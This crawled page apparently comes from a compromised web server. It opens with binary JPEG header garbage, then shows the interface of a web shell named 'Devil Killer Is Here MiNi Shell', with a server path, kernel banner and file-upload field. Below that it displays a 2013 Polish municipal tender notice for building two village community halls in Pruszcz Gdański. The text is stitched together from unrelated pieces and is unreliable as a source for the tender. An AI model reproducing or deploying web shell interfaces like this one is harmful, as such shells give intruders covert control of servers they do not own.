JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130904/178221-N-2013.html

<p class="kh_header"><b>Pruszcz Gdański: Budowa budynku:
zadanie nr 1 - świetlicy wiejskiej w Roszkowie przy ul. Lipowej dz. nr 125
zadanie nr 2 - świetlicy wiejskiej w Świńczu dz. nr 160/1</b><br>
<b>Numer ogłoszenia: 178221 - 2013; data zamieszczenia: 04.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pruszcz Gdański , ul. Wojska Polskiego 30, 83-000 Pruszcz Gdański, woj. pomorskie, tel. 0-58 692 94 21, 692 94 00, faks 0-58 682 27 14.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pruszczgdanski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa budynku:
zadanie nr 1 - świetlicy wiejskiej w Roszkowie przy ul. Lipowej dz. nr 125
zadanie nr 2 - świetlicy wiejskiej w Świńczu dz. nr 160/1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:
1)	 Zadanie nr 1 - budowa budynku świetlicy wiejskiej w Roszkowie przy ul. Lipowej, dz. nr 125 w Gminie Pruszcz Gdański zgodnie z opisem zawartym w załączniku nr 1 do SIWZ 
2)	Zadanie nr 2 - budowa budynku świetlicy wiejskiej w Świńczu, dz. nr 160/1 w Gminie Pruszcz Gdański zgodnie z opisem zawartym w załączniku nr 2 do SIWZ.
2.	Powyższe zakresy należy wykonać zgodnie z załączonymi dokumentacjami technicznymi.
3.	Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie innych tj. równoważnych materiałów i urządzeń niż podane w dokumentacji technicznej pod warunkiem zapewnienia wszystkich parametrów nie gorszych niż określone w tej dokumentacji. Dopuszcza się również rozwiązania /równoważne/ w zakresie wskazanych w dokumentacji przetargowej norm/aprobat/systemów/certyfikatów/zaświadczeń jakości. W takiej sytuacji Zamawiający wymaga złożenia stosownych dokumentów uwiarygodniających. Złożone w/w dokumenty będą podlegały ocenie przez autora dokumentacji, który sporządzi stosowną opinię. Opinia ta będzie podstawą do podjęcia przez Zamawiającego decyzji o odrzuceniu oferty z powodu /nierównoważności/ zaproponowanych /zamienników/. W przypadku, gdy Wykonawca nie złoży w ofercie dokumentów o zastosowaniu innych materiałów i urządzeń, to rozumie się przez to, że do kalkulacji ceny oferty oraz do późniejszej realizacji zamówienia ujęto materiały i urządzenia zaproponowane w dokumentacji technicznej. 
4.	Wykonawca zobowiązany jest do współdziałania z Zamawiającym w celu uzyskania pozwolenia na użytkowanie obiektu.
5.	Wskazane jest, aby Wykonawca dokonał wizji lokalnej miejsca roboty budowlanej, aby uzyskać informacje, które mogą być konieczne do przygotowania oferty, zawarcia umowy i wykonania zamówienia. Koszty dokonania wizji lokalnej poniesie Wykonawca..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.30.00.00-0, 45.40.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od wykonawców wniesienia wadium w wysokości: 
dla zadania nr 1 - 5 000 zł
dla zadania nr 2 - 4 000 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie wykonał (zakończył) co najmniej dwie roboty budowlane polegające na budowie lub przebudowie budynku we wszystkich branżach o wartości wykonanych prac co najmniej 170 000,00 zł brutto każda.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż dysponuje osobami zdolnymi do wykonania zamówienia, posiadającymi doświadczenie, wykształcenie i kwalifikacje zawodowe odpowiednie do stanowisk, jakie zostaną im powierzone tj.
osobą, która pełnić będzie funkcję kierownika budowy, posiadającą uprawnienia budowlane w specjalności konstrukcyjno - budowlanej; 
osobą, która pełnić będzie funkcję kierownika robót, posiadającą uprawnienia budowlane w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
osobą, która pełnić będzie funkcję kierownika robót, posiadającą uprawnienia budowlane w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
Zamawiający dopuszcza połączenie wyżej wskazanych funkcji pod warunkiem spełnienia przez osobę łączącą te funkcje wszystkich warunków wymaganych dla poszczególnych funkcji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Dokumentami potwierdzającymi spełnianie warunku, o którym mowa w rozdziale VI ust. 1 niniejszej specyfikacji muszą być:
1)	Wykaz wykonanych robót budowlanych w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów potwierdzających, że roboty te zostały wykonane w sposób należyty zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone - zgodnie z treścią załącznika nr 5 do SIWZ. 
(W przypadku robót budowlanych, których wartość została wyrażona w umowie w innej walucie niż PLN należy dokonać przeliczenia tej waluty na PLN przy zastosowaniu średniego kursu NBP na dzień zakończenia tych robót budowlanych).
a)	Dowodami, o których mowa w rozdz. VII ust. 1 pkt.1 są:
- poświadczenia lub 
- inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca, nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.
b)	Wykonawca w miejsce poświadczeń, o których mowa w ust. 1 pkt. 1 lit. a - może przedkładać dokumenty potwierdzające należyte wykonanie robót budowlanych zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2009r. Nr 226, poz. 1817).
c)	W przypadku, gdy Zamawiający jest podmiotem, na rzecz, którego roboty budowlane wskazane w wykazie, o którym mowa w ust. 1 pkt. 1, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów opisanych w ust. 1 pkt. 1 lit. a.
2.	Dokumentami potwierdzającymi spełnianie warunku, o którym mowa w rozdziale VI ust. 2 niniejszej specyfikacji muszą być:
Wykaz osób, którymi dysponuje Wykonawca i które będą odpowiedzialne za kierowanie robotami budowlanymi (zgodnie z treścią załącznika nr 6 do SIWZ) wraz z informacją o podstawie do dysponowania tymi osobami oraz oświadczeniem, że osoby te posiadają wymagane przepisami prawa uprawnienia budowlane do kierowania budową,
3.	Dokumentami potwierdzającymi spełnianie warunku, o którym mowa w rozdziale VI ust. 3 niniejszej specyfikacji muszą być: 
1)	oświadczenie o braku podstaw do wykluczenia na podstawie art. 24 ust. 1 ustawy Prawo zamówień publicznych - stanowiące załącznik nr 4 do SIWZ;
2)	aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
3)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
4)	aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
4.	Wykonawca wraz z ofertą, zobowiązany jest do złożenia listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust 2 pkt. 5 ustawy pzp, albo informację o tym, że nie należy do grupy kapitałowej, (zgodnie z treścią zał. nr 3 Formularz oferty).
5.	W przypadku składania oferty wspólnej przez kilku przedsiębiorców (tzw. konsorcjum) lub przez spółkę cywilną, każdy ze wspólników konsorcjum lub spółki cywilnej musi złożyć dokumenty, o którym mowa w rozdziale VII ust. 3 SIWZ oraz złożyć listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust 2 pkt. 5 ustawy pzp, albo informację o tym, że nie należy do grupy kapitałowej.
6.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, to:
1)	zamiast dokumentów, o których mowa w rozdziale VII ust. 3 pkt 2-4 SIWZ składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
2)	Dokumenty, o których mowa w ust. 6 pkt. 1 lit. a, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokumenty, o których mowa w ust. 6 pkt. 1 lit. b, powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3)	Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 6 pkt. 1, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Przepis ust. 6 pkt. 2 stosuje się odpowiednio.
7.	Jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, (niezależnie od charakteru prawnego łączących go z nimi stosunków) zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Ww. zobowiązanie musi zostać załączone do oferty przetargowej w oryginale.
8.	Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy pzp, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w rozdziale VII ust. 3.
9.	Inne dokumenty wymagane przez Zamawiającego: wypełniony druk /Formularz oferty/, stanowiący załącznik nr 3 do niniejszej specyfikacji, zawierający oświadczenie, że Wykonawca spełnia wszystkie warunki określone w SIWZ oraz w art. 22 ust. 1 ustawy pzp.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podanych warunków jej wprowadzenia:
1)	Termin wykonania umowy, określony w § 3 ust. 2 umowy może ulec zmianie z powodu opóźnień wynikających z:
a)	zmian spowodowanych warunkami atmosferycznymi: klęski żywiołowe, warunki atmosferyczne odbiegające od typowych, uniemożliwiające prowadzenie robót, przeprowadzanie prób, sprawdzeń, dokonywanie odbiorów, 
b)	zmian spowodowanych nieprzewidzianymi w siwz warunkami geologicznymi, architektonicznymi lub terenowymi,
c)	zmian będących następstwem okoliczności leżących po stronie Zamawiającego: wstrzymanie robót przez Zamawiającego, konieczność wprowadzenia zmian w dokumentacji projektowej, 
d)	zmian będących następstwem działania innych podmiotów lub organów np. eksploatatorów infrastruktury,
e)	innych niezależnych od Wykonawcy i Zamawiającego okoliczności, wskutek których niemożliwe będzie ukończenie zamówienia w terminie umownym.
2)	Okoliczności powodujące opóźnienia, o których mowa w pkt. 1 muszą być odnotowane w Dzienniku Budowy oraz udokumentowane stosownymi protokołami podpisanymi przez kierownika budowy. Po zatwierdzeniu ich przez Zamawiającego ustala się nowe terminy wykonania umowy, z tym że maksymalny okres przesunięcia terminu wykonania umowy nie może być dłuży niż okres przerwy lub przestoju.
3)	Zmiana kadry osobowej Wykonawcy wskazanej w ofercie do wykonania zamówienia jest możliwa pod warunkiem zaproponowania innych osób spełniających pierwotne warunki SIWZ. W szczególności konieczności zmian kadry osobowej Wykonawcy wymaga sytuacja gdy Zamawiający uzna, że osoby te nie wykonują należycie swoich obowiązków. Wykonawca zobowiązany jest dokonać zmiany tych osób w terminie nie dłuższym niż 7 dni od daty złożenia wniosku Zamawiającego. 
4)	Zmiana podmiotu, o którym mowa w art. 26 ust. 2b ustawy Prawo zamówień publicznych jest możliwa pod warunkiem zaproponowania nowego podmiotu, spełniającego pierwotne warunki  określone w SIWZ. 
5)	Wystąpienia zmian powszechnie obowiązujących przepisów prawa podatkowego w zakresie stawki podatku VAT, co skutkować będzie zmianą wynagrodzenia brutto.
6)	Dopuszcza się możliwość wystąpienia robót zamiennych w stosunku do przewidzianych dokumentacją projektową oraz SIWZ w sytuacji, gdy wykonanie tych robót będzie niezbędne do prawidłowego (zgodnego z zasadami wiedzy technicznej i obowiązującego prawa) wykonania przedmiotu umowy i jego dalszej eksploatacji. Zmiana taka nie może spowodować zmiany wynagrodzenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pruszczgdanski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Pruszcz Gdański ul. Wojska Polskiego 30 83-000 Pruszcz Gdański - pokój nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.09.2013 godzina 11:00, miejsce: Urząd Gminy Pruszcz Gdański ul. Wojska Polskiego 30 83-000 Pruszcz Gdański - pokój nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa budynku świetlicy wiejskiej w Roszkowie przy ul. Lipowej, dz. nr 125 w Gminie Pruszcz Gdański.</p>
